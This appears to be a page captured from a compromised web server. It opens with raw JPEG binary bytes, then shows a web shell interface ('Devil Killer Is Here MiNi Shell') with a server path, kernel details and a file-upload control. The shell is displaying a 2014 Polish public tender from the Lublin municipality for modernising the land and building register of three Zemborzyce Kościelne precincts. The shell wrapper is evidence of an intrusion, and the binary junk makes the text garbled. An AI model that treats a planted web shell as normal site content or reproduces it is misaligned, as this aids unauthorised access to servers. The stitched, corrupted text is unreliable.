JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140606/123207-N-2014.html

<p class="kh_header"><b>Lublin: modernizacja ewidencji gruntów i budynków Miasta Lublin dla n.w. obrębów: Obręb 49- Zemborzyce Kościelne II, Obręb 50 - Zemborzyce Kościelne III, Obręb 52 - Zemborzyce Kościelne V</b><br>
<b>Numer ogłoszenia: 123207 - 2014; data zamieszczenia: 06.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lublin , Pl. Króla Władysława Łokietka 1, 20-109 Lublin, woj. lubelskie, tel. 81 4663000, faks 81 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> modernizacja ewidencji gruntów i budynków Miasta Lublin dla n.w. obrębów: Obręb 49- Zemborzyce Kościelne II, Obręb 50 - Zemborzyce Kościelne III, Obręb 52 - Zemborzyce Kościelne V.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje modernizację ewidencji gruntów i budynków Miasta Lublin dla n.w. obrębów:
- Obręb 49 - Zemborzyce Kościelne II 
Powierzchnia  obrębu - 293 ha
Ilość jednostek rejestrowych  - 65
Ilość działek  - 119
Ilość budynków - 141
- Obręb 50 - Zemborzyce Kościelne III 
Powierzchnia  obrębu - 291 ha
Ilość jednostek rejestrowych  - 342
Ilość działek  - 480
Ilość budynków - 485
-  Obręb 52 - Zemborzyce Kościelne V 
Powierzchnia  obrębu - 191 ha
Ilość jednostek rejestrowych  - 285
Ilość działek  - 409
Ilość budynków - 244             
2. Zakres i wielkość prac są zgodne z Projektem modernizacji ewidencji gruntów i budynków w/w obrębów uzgodnionym przez Lubelskiego Wojewódzkiego Inspektora Nadzoru Geodezyjnego i Kartograficznego w Lublinie pismem z dnia 02 czerwca 2014r. znak:IGK-II.7231.9.2014.SP. 
3. Część opisowa ewidencji gruntów prowadzona jest w systemie EWGRUN w wersji 93.07, natomiast dane ewidencyjne budynków i lokali w systemie EWBUD w wersji 93.06.  Numeryczna baza danych ewidencji gruntów i budynków prowadzona jest w systemie EWMAPA w wersji 8.
4. Podstawa prawna.
1) Ustawa z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (Dz.U. z 2010r, Nr. 193, poz.1287 ze zm.), zwana dalej ustawą,
2) Rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001r. w sprawie ewidencji gruntów i budynków (Dz.U. z 2001r. Nr 38, poz.454) ze zmianami wprowadzonymi rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 29 listopada 2013r. zmieniającym rozporządzenie w sprawie ewidencji gruntów i budynków (Dz.U. z 2013r., poz.1551) zwane dalej rozporządzeniem,
3) Rozporządzenie Ministra Administracji i Cyfryzacji z dnia 12 lutego 2013r. w sprawie bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu, bazy danych obiektów topograficznych oraz mapy zasadniczej (Dz.U. z 2013r., poz.383),
4) Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 9 listopada 2011r. w sprawie standardów technicznych wykonywania geodezyjnych pomiarów sytuacyjnych i wysokościowych oraz opracowywania i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego (Dz.U. Nr 263, poz.1572).
5. Cel prac modernizacyjnych.  
5.1 Uzupełnienie bazy danych ewidencji gruntów i budynków oraz pozyskanie danych dla nowych budynków i lokali zgodnie z  wyżej przytoczonymi przepisami prawa.
5.2 Modyfikacja istniejących danych ewidencyjnych do wymagań określonych w rozporządzeniu.
6. Zakres przewidywanych prac do wykonania.
6.1 Uzupełnienie danych opisowych ewidencji gruntów stosownie do wymagań określonych w rozporządzeniu z wyłączeniem gleboznawczej klasyfikacji gruntów,
6.2 Uzupełnienie danych opisowych dotyczących budynków i lokali oraz pozyskanie danych dla nowych budynków i lokali zgodnie z przedłożonym wzorem arkusza  spisowego budynku i załącznika do tabeli arkusza spisowego budynku, który stanowi jego integralną część.   
6.3 Aktualizacja komputerowych baz danych w zakresie numerycznego opisu granic działek ewidencyjnych wraz z określeniem cech i atrybutów punktów granicznych.
6.4 Aktualizacja komputerowych baz danych ewidencyjnych obejmujących rejestr gruntów i rejestr budynków oraz założenie rejestrów dla nowych budynków.        
6.5 Aktualizacja komputerowych baz danych ewidencyjnych obejmujących rejestr lokali oraz założenie rejestrów dla nowych lokali.      
6.6 Aktualizacja komputerowych baz danych graficznych konturów, użytków i budynków.
Aktualizacja komputerowych zbiorów danych opisowych ewidencji gruntów,    budynków i lokali przeprowadzona zostanie z zastosowaniem oprogramowania 	EWBUD w wersji 93.06 i EWGRUN w wersji 93.07, natomiast aktualizacja 	komputerowych baz danych graficznych ewidencji gruntów i budynków 	przeprowadzona zostanie z zastosowaniem oprogramowania EWMAPA w wersji 8. 
Pozyskane dane ewidencyjne powinny zapewnić możliwość tworzenia podstawowych i pomocniczych raportów.
1) Raporty podstawowe:
a) rejestr gruntów, 
b) rejestr budynków, 
c) rejestr lokali,     
d) kartoteka budynków, 
e) kartoteka lokali, 
f) mapa ewidencyjna 
2) Raporty pomocnicze:
a) zestawienie gruntów,
b) wykaz gruntów,
c) wykaz budynków,
d) wykaz lokali,
e) skorowidz działek ewidencyjnych,
f) wykazy:
- podmiotów ewidencyjnych,
- osób, jednostek organizacyjnych i organów o których mowa w § 11, ust.1, pkt1) w/w rozporządzenia,
- dzierżawców gruntów. 
7. Źródła danych ewidencyjnych i metody ich pozyskania.
7.1 Materiały i informacje zgromadzone w państwowym zasobie geodezyjnym i  kartograficznym w tym:
1) dokumentacje geodezyjne przyjęte do państwowego zasobu geodezyjnego i  kartograficznego, sporządzone: 
a) w postępowaniu rozgraniczeniowym, 
b) w celu podziału nieruchomości, 
c) w postępowaniu scaleniowym i wymiany gruntów,
d) w postępowaniu dotyczącym scalenia i podziału nieruchomości,
e) na potrzeby postępowania sądowego lub administracyjnego, a następnie wykorzystanej do wydania prawomocnego orzeczenia sądowego lub ostatecznej decyzji administracyjnej,
f) przy zakładaniu ewidencji gruntów i budynków, na podstawie poprzednio obowiązujących przepisów, 
g) w wyniku geodezyjnego pomiaru sytuacyjnego istniejących lub wznowionych znaków  granicznych albo wyznaczonych punktów granicznych.
2) dokumentacje kartograficzne w postaci analogowej: mapa zasadnicza w skali 1:500, mapa ewidencyjna w skali 1:1000, zarys numeryczny granic działek,
3) numeryczna baza działek, konturów, użytków  i budynków w systemie EWMAPA Win.,
4) informatyczny bank punktów granicznych prowadzony w oprogramowaniu Katalog,
5) komputerowe bazy danych opisowych ewidencji dot. gruntów, budynków i lokali prowadzone w informatycznych systemach EWGRUN i EWBUD posiadające możliwość generowania rejestru gruntów, rejestru budynków i lokali,
6) osnowa pozioma podstawowa i szczegółowa III klasy w układzie współrzędnych 2000.       
7.2. Wyniki terenowych pomiarów geodezyjnych.
7.3. Dane zawarte w innych ewidencjach i rejestrach, prowadzonych na podstawie odrębnych przepisów przez: sądy, organy administracji publicznej oraz państwowe i samorządowe jednostki organizacyjne.
7.4. Dane zawarte w dokumentach udostępnionych przez zainteresowane osoby, organy i jednostki organizacyjne.
7.5. Dane zawarte w dokumentacji architektoniczno - budowlanej gromadzonej i przechowywanej przez organy administracji publicznej.
7.6 Wyniki oględzin.
7.7.Dane ewidencyjne i opisowe budynków w arkuszach spisowych budynków oraz kartach budynków. Dane ewidencyjne i opisowe lokali w arkuszach spisowych lokali.
7.8 Inne - zestawienie statystyczne materiałów źródłowych
Załącznik statystyczny do modernizacji 
ewidencji gruntów i budynków 
Materiały źródłowe wykorzystane do założenia ewidencji gruntów i budynków :
- Geodezyjne pomiary terenowe poprzedzone ustaleniem granic, wykonywane przed 1989 r.
- Geodezyjne pomiary terenowe poprzedzone ustaleniem granic, wykonywane po 1989 r.
- Geodezyjne pomiary terenowe nie poprzedzone ustaleniem granic, wykonywane przed 1989 r.
 - Geodezyjne pomiary terenowe nie poprzedzone ustaleniem granic, wykonywane po 1989 r.
 - Pomiary autogrametryczne
 - Fotomapa
 - Inne pomiary fotogrametryczne
 - Materiały powstałe w wyniku scaleń gruntów wykonanych przed 1946 r.
 - Materiały powstałe w wyniku scaleń gruntów wykonanych w latach 1946 - 1989
 - Materiały powstałe w wyniku scaleń gruntów wykonanych po 1989 r.
 - Materiały pochodzące z byłego katastru austriackiego
 - Materiały pochodzące z byłego katastru pruskiego
 - Mapy parcelacyjne z okresu międzywojennego
 - Mapy poregulacyjne powstałe w latach powojennych
 - Inne opracowania
Odnowienie operatu ewidencji gruntów :
- Na podstawie nowego pomiaru szczegółowego obejmującego cały obręb ewidencyjny
- Na podstawie nowego pomiaru szczegółowego obejmującego część obrębu ewidencyjnego
- Bez wykonywania nowego pomiaru szczegółowego
- Odnowienia nie przeprowadzono
Modernizacja ewidencji gruntów i budynków :
W części dotyczącej granic działek ewidencyjnych:
 - Pomiar co najmniej 70% punktów granicznych
 - Pomiar 30 - 69% punktów granicznych
 - Pomiar 10 - 29% punktów granicznych
 - Pomiar do 10% punktów granicznych lub brak pomiaru
8. System, w którym prowadzona będzie ewidencja:
8.1 Część opisowa  - EWBUD w wersji 93.06 i EWGRUN w wersji 93.07.
8.2 Część geometryczna - EWMAPA w wersji 8 lub nowszej.
9. Rzeczowy zakres opracowania:
Etap I:
9.1 .Analiza i ocena wszystkich materiałów geodezyjnych przyjętych do państwowego zasobu geodezyjnego i kartograficznego. Należy przeanalizować wszystkie materiały geodezyjne mające znaczenie dla wykazania przebiegu granic działek ewidencyjnych (§ 36 w/w rozporządzenia).  Analizą należy objąć aspekty prawne i techniczne materiałów geodezyjnych, a jej wyniki  przedstawić w formie tabelarycznej wg narastających numerów ewidencyjnych operatów i przekazać w postaci informatycznej oraz wydruku na papierze.   
9.2  Szczegółowa analiza i ocena istniejących danych bazy punktów granicznych.
Analizą należy objąć każdy punkt graniczny funkcjonujący w istniejącej bazie, dokonać jego wszechstronnej oceny pod względem statusu prawnego i spełnienia wymogów obowiązujących standardów technicznych (§ 36 i 37 w/w rozporządzenia). Należy sporządzić historię każdego punktu granicznego z wyszczególnieniem źródła pochodzenia (numeru operatu), charakteru prawnego, standardu technicznego, występujących protokołach (z informacją o podpisach stron lub ewentualnych uwagach wniesionych do protokołu), rodzaju stabilizacji (markowania) i ewentualnym opisie słownym położenia punktu (szczegół sytuacyjny lub odniesienie do niego).
Historię punktów należy sporządzić w formie tabelarycznej, w kolejności numerów punktów z istniejącej bazy i przekazać w postaci informatycznej oraz wydruku na papierze.     
 W wyniku opracowania dla wszystkich punktów granicznych muszą być określone atrybuty opisowe zgodnie z obowiązującymi przepisami prawa.
9.3  Analiza przebiegu granic obrębów.
 Należy poddać analizie każdy punkt graniczny obrębu, porównać ich położenie z punktami obrębów sąsiednich i stanem zagospodarowania terenu. 
W przypadkach prawnie i technicznie uzasadnionych do zmiany przebiegu granic obrębów ewidencyjnych należy sporządzić odpowiednią dokumentację, zawierającą również badania stanów prawnych oraz  obliczenia dotyczące działek obrębów sąsiednich, objętych zmianą.    
9.4  Sporządzenie mapy przeglądowej.
W wyniku przeprowadzonych analiz dokumentacji geodezyjnych należy sporządzić mapę przeglądową na kopiach zarysów numerycznych przebiegu granic działek. Mapa winna zawierać  charakterystykę prawną i techniczną punktów granicznych oraz zakres przewidzianych do wykonania prac modernizacyjnych w stosunku do każdego punktu tj.: 
1) odszukanie utrwalonych poprzednio znaków granicznych, 
2) wznowienie znaku granicznego lub wyznaczenie punktu granicznego w trybie art.39 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (Dz.U. z 2010r., Nr 193, poz.1287 ze zm), zwanej dalej ustawą,
3) ustalenie przebiegu granic działek ewidencyjnych w trybie § 37-39 w/w rozporządzenia, 
4) ewentualnie inne wnioski wynikające z analiz, uzasadnione w formie opisowej, 
5) każdy punkt graniczny musi posiadać charakterystykę dokładnościową (średni błąd położenia).
Mapę przeglądową należy opatrzeć odpowiednią legendą.     
Wyniki analiz oraz mapę przeglądową należy przedłożyć Zamawiającemu do wglądu przed rozpoczęciem dalszych prac. 
9.5  Założenie osnowy pomiarowej.
W oparciu o istniejącą osnowę podstawową i szczegółową III klasy należy założyć jednolitą osnowę pomiarową (jednorzędową). Wszystkie istniejące punkty osnowy pomiarowej należy włączyć do ponownego pomiaru i ścisłego wyrównania z określeniem średniego błędu położenia punktów. Pomiar osnowy zaleca się wykonać w technologii pomiarów satelitarnych. Wyrównanie należy wykonać w układzie współrzędnych 2000. Na terenach z utwardzoną nawierzchnią dopuszcza się jednopoziomową  stabilizację punktów w formie metalowych znaków. Na terenach rolnych stabilizacje należy wykonać znakami trwałymi z podcentrem. Koncepcję założenia osnowy pomiarowej należy uzgodnić z Miejskim Ośrodkiem Dokumentacji Geodezyjnej i Kartograficznej w Lublinie. Do Ośrodka należy przekazać na nośniku informatycznym obserwacje kątowo-liniowe, wyniki wyrównania oraz opisy topograficzne punktów (niezależnie od formy analogowej).     
9.6 Ustalenie aktualnego stanu prawnego nieruchomości należy wykonać zgodnie z obowiązującymi przepisami prawa. Należy dokonać analizy i aktualizacji zapisów ewidencji gruntów, budynków i lokali w zakresie osób aktualnie władających nieruchomościami.
9.7  Ustalenie i pomiar przebiegu granic działek ewidencyjnych. 
1) Przebieg granic działek ewidencyjnych należy wykazać:
a) na podstawie dokumentacji geodezyjnej przyjętej do państwowego zasobu geodezyjnego i kartograficznego (§ 36 w/w rozporządzenia), 
b) w wyniku ustalenia przebiegu granic wg zgodnego oświadczenia stron złożonego do protokołu ustalenia  (§39 ust.1 w/w rozporządzenia),
c) według ostatniego spokojnego stanu posiadania, jeżeli ten stan posiadania nie jest sprzeczny z informacjami zawartymi w dostępnych dokumentach - w przypadku braku zgodnego oświadczenia (§39 ust.2 w/w rozporządzenia),
d) po zbadaniu położenia znaków i śladów granicznych oraz po przeprowadzeniu analizy wszelkich dostępnych dokumentów w tym oświadczeń zainteresowanych podmiotów i świadków - w przypadku braku spokojnego stanu posiadania lub stwierdzenia, że jest on sprzeczny z informacjami zawartymi w dostępnych dokumentach określających stan prawny gruntów (§39 ust.3 w/w rozporządzenia),   
2) Wykazanie przebiegu granic działek ewidencyjnych na podstawie dokumentacji przyjętej do państwowego zasobu geodezyjnego i kartograficznego może być dokonane w oparciu o jej analizę i ocenę wykonaną w pkt 9.1. Jeżeli w wyniku analizy zostanie stwierdzona pełna wiarygodność danych oraz potwierdzony zostanie ich standard techniczny, czynności związane z wykazaniem granic należy ograniczyć do pomiaru kontrolnego, w celu określenia średniego błędu położenia punktu granicznego względem najbliższej osnowy spełniającej obowiązujące standardy techniczne. 
W tym przypadku nie ma obowiązku sporządzenia protokołu granicznego. W przypadku nie odszukania znaku granicznego lub jeżeli nie były one osadzone na gruncie, należy je wznowić lub przystąpić do wyznaczenia punktów granicznych w trybie art.39 ustawy. 
Na tę okoliczność należy sporządzić protokół i włączyć go do operatu technicznego.
3) Ustalenia przebiegu granic działek ewidencyjnych na gruncie należy dokonać zgodnie z obowiązującymi w tym zakresie przepisami prawa.
4)  Terenowe pomiary geodezyjne punktów załamania granic działek ewidencyjnych oraz konturów budynków należy wykonać w oparciu o punkty osnowy geodezyjnej spełniającej wymagania dokładnościowe określone w rozporządzeniu określającym standardy techniczne lub w technologii pomiarów satelitarnych. Stosowane metody pomiaru powinny zapewnić określenie położenia szczegółów terenowych względem najbliższych elementów poziomej osnowy geodezyjnej z dokładnością podaną w rozporządzeniu określającym standardy techniczne. Obliczenie współrzędnych punktów należy wykonać w obowiązującym układzie 2000.  
5) Punkty graniczne, dla których w wyniku analizy materiałów stwierdzono, że ich dane nie spełniają wymogów obowiązujących standardów technicznych, podlegają ustaleniu i pomiarowi na gruncie (§ 37 w/w rozporządzenia). Procedurę postępowania określa § 38  i 39 w/w rozporządzenia. Wymagane jest aby w protokołach ustalenia przebiegu granic oraz na szkicach polowych z pomiaru podawać informację słowną i liczbową o przebiegu granicy względem trwałych elementów zagospodarowania terenu a w szczególności omówić przypadki ich wzajemnej kolizji - przecinania.
6) Niedopuszczalne jest bezpośrednie wykorzystanie do wznawiania znaków granicznych i wyznaczania punktów granicznych danych nie spełniających  standardów technicznych, chyba że czynności te wykonywane są w oparciu o te same punkty poziomej osnowy geodezyjnej, która wykorzystywana była do pomiaru pierwotnego oraz przy wykorzystywaniu danych obserwacyjnych pierwotnego pomiaru. W przypadkach braku możliwości odtworzenia osnowy pierwotnej, do wyznaczenia punktów granicznych może być wykorzystana osnowa istniejąca, po uprzednim przeprowadzeniu odpowiednich działań, mających na celu optymalne dostosowanie pierwotnych danych obserwacyjnych (w tym współrzędnych) do osnowy aktualnej.
7) Po zakończeniu czynności związanych bezpośrednio ze wznowieniem znaków granicznych lub wyznaczeniem punktów granicznych, w każdym przypadku należy dokonać pomiaru tych punktów, w oparciu o osnowę geodezyjną, spełniającą kryteria dokładności określone w rozporządzeniu określającym standardy techniczne lub w technologii pomiarów satelitarnych  oraz dokonać analizy rozbieżności.
8) W razie braku dokumentacji wymienionej w § 36 w/w rozporządzenia  lub jeżeli zawarte w niej dane nie są wiarygodne, należy dokonać geodezyjnych pomiarów terenowych poprzedzonych ustaleniem przebiegu tych granic. Ustalone punkty graniczne należy zamierzyć w oparciu o osnowę spełniającą kryteria dokładności zawarte w rozporządzeniu określającym standardy techniczne lub w technologii pomiarów satelitarnych. 
9) W trakcie pomiaru punktów granicznych należy obowiązkowo pomierzyć jednocześnie kontury budynków wybudowanych w graniach działek i w odległości do 1,0 m od tych granic.  
10) W przypadku braku możliwości wejścia na nieruchomość, dla ustalenia przebiegu granic, należy w protokole opisać jego przyczynę. Należy ustalić dodatkowy termin związany z obecnością  właścicieli. W przypadku nieudostępnienia posesji przez właścicieli należy poinformować ich, że wszelkie postępowania związane z pomiarem granic będą w przyszłości finansowane z ich własnych środków. Powyższe należy udokumentować wpisem w protokole. W przypadku stwierdzenia zajęcia nieruchomości Skarbu Państwa (Gminy Lublin) lub ich części przez właściciela nieruchomości sąsiedniej, należy sporządzić ich wykaz.
9.8 Pomiar pozostałych szczegółów sytuacyjnych stanowiących treść mapy ewidencji gruntów i budynków.  Pomiarowi podlegają bezwzględnie budynki istniejące w bazie numerycznej z digitalizacji mapy analogowej. Współrzędne narożników budynków z pomiaru należy przekazać w postaci pliku tekstowego pikiet z numeracją obowiązującą w MODGiK.
 Do kalkulacji ceny należy zakładać, że dane dotyczące 70% budynków nie spełniają wymaganych standardów. Ewentualne pozyskanie danych numerycznych budynków na podstawie istniejącej dokumentacji geodezyjnej uwarunkowane jest jej oceną pod kątem spełnienia obowiązujących standardów technicznych. W przypadku wykorzystania istniejących materiałów należy sporządzić wyciągi współrzędnych, szkice z numeracją punktów opatrzone kodem budynku oraz wpisanym numerem ewidencyjnym operatu technicznego, z którego wykorzystano dane. W opracowaniu nie mogą znaleźć się współrzędne pochodzące z  digitalizacji ( wektoryzacji ).
9.9  Przetworzenie danych pomiarowych. Redakcja roboczej bazy działek ewidencji gruntów. Powierzchnie działek ewidencyjnych należy obliczyć po zredagowaniu roboczej bazy danych. Należy sporządzić wykaz porównawczy powierzchni. 
W operacie ewidencyjnym w każdym przypadku dla działki należy ujawnić pole powierzchni geodezyjnej obliczone ze współrzędnych oraz zredukowane, bez względu na wielkość odchyłki pomiędzy powierzchnią geodezyjną a dotychczasową powierzchnią ewidencyjną.  Stwierdzone w tym zakresie różnice i rozbieżności należy przeanalizować i wyjaśnić w uzgodnieniu z Zamawiającym. 
9.10 Aktualizacja komputerowych baz danych numerycznych granic działek wraz z określeniem cech i atrybutów punktów granicznych.
9.11 Aktualizacja ewidencyjnych danych opisowych w zakresie budynków nastąpi na podstawie informacji wprowadzonych do arkuszy spisowych budynków.
9.12  Aktualizacja danych opisowych w zakresie lokali. Podstawą aktualizacji będą lokale występujące w ewidencji lokali uznane przez Zamawiającego za lokale o niepełnej informacji. Zamawiający wydrukuje z aktualnej bazy danych karty budynków, na których lokale stanowiące przedmiot aktualizacji będą oznaczone gwiazdką (ostatnie linie karty). Dla zaznaczonych gwiazdką lokali wykonawca dokona aktualizacji danych ewidencyjnych i opisowych w zakresie ilości izb oraz rodzaju i powierzchni pomieszczeń przynależnych. Lokal należy przypisać do podmiotu a nie do jednostki rejestrowej.   
9.13 Aktualizacja komputerowej bazy danych ewidencji gruntów, budynków i lokali.
Komputerowe zbiory danych opisowych zostaną zaktualizowane na podstawie zgromadzonych danych źródłowych z zastosowaniem programu EWBUD w wersji 93.06 i EWGRUN w wersji 93.07, natomiast aktualizacja komputerowych baz danych graficznych ewidencji gruntów i budynków przeprowadzona zostanie z zastosowaniem oprogramowania EWMAPA w wersji 8. Do systemu należy wprowadzić atrybuty punktów granicznych. 
Aktualizacja dotychczasowych i wprowadzenie nowych danych do systemu EWBUD, EWGRUN i EWMAPA, odbywać się będzie w siedzibie Zamawiającego na udostępnionym stanowisku pracy. W szczególności aktualizacja dotyczyć będzie również budynków wg naniesionych zmian na kartach budynków oraz lokali wg arkuszy spisowych lokali o których mowa w pkt 9.11 i 9.12. 
Przyporządkowanie poszczególnych lokali do podmiotów oraz wprowadzenie ich parametrów technicznych (w tym pomieszczenia przynależne) należy wykonać w siedzibie Zamawiającego w systemie EWBUD i EWGRUN lub innym systemie wskazanym przez Zamawiającego. 
Istniejącą bazę graficzną ewidencji budynków należy zaktualizować w formie obiektowej z oznaczeniem pochodzenia danych (w szczególności numer operatu technicznego). Dla każdej jednostki rejestrowej, której działki wymagają zmiany w bazie opisowej należy sporządzić zbiory tekstowe granic działek z EWMAPY z podaniem numeru zmiany z bazy opisowej.
Etap II.
9.14 Wyłożenie projektu operatu ewidencji gruntów, budynków i lokali do wglądu osób zainteresowanych i rozpatrzenie zgłaszanych uwag. 
Dokumentacja przygotowana do wyłożenia projektu operatu opisowo-kartograficznego winna zawierać ostateczny protokół kontroli wykonanych prac i sporządzonej dokumentacji, kwalifikujący dokumentację do przyjęcia do państwowego zasobu geodezyjnego i kartograficznego. 
Wyłożenia projektu operatu ewidencji gruntów, budynków i lokali dokonuje się zgodnie z art.24a ust.4-7 ustawy Prawo geodezyjne i kartograficzne. 
Protokół z wyłożenia projektu operatu sporządza Wykonawca.                                       
Protokół powinien zawierać:
1) datę i miejsce jego sporządzenia, 
2) wyszczególnienie osób, które zapoznały się z odpowiednimi danymi, numer jednostki rejestrowej, pozycje kartotek, w których te dane były zawarte, opis uwag i zastrzeżeń.
3) imiona, nazwiska i stanowiska osób, które w imieniu wykonawcy i organu brały udział w wyłożeniu projektu oraz ich podpisy.   
Uwagi zgłoszone do projektu operatu opisowo-kartograficznego rozpatruje Prezydent Miasta Lublin przy udziale Wykonawcy. 
Pracownik upoważniony przez Prezydenta Miasta Lublin, posiadający uprawnienia o których mowa w art.43 pkt.2 ustawy uprawnienia zawodowe w zakresie: rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych, przy udziale Wykonawcy prac geodezyjnych i kartograficznych, rozstrzyga o przyjęciu lub odrzuceniu uwag zgłoszonych do tego projektu, po czym informuje zgłaszającego uwagi o sposobie rozpatrzenia uwag oraz sporządza wzmiankę o treści zgłoszonych uwag i sposobie ich rozpatrzenia w protokole. 
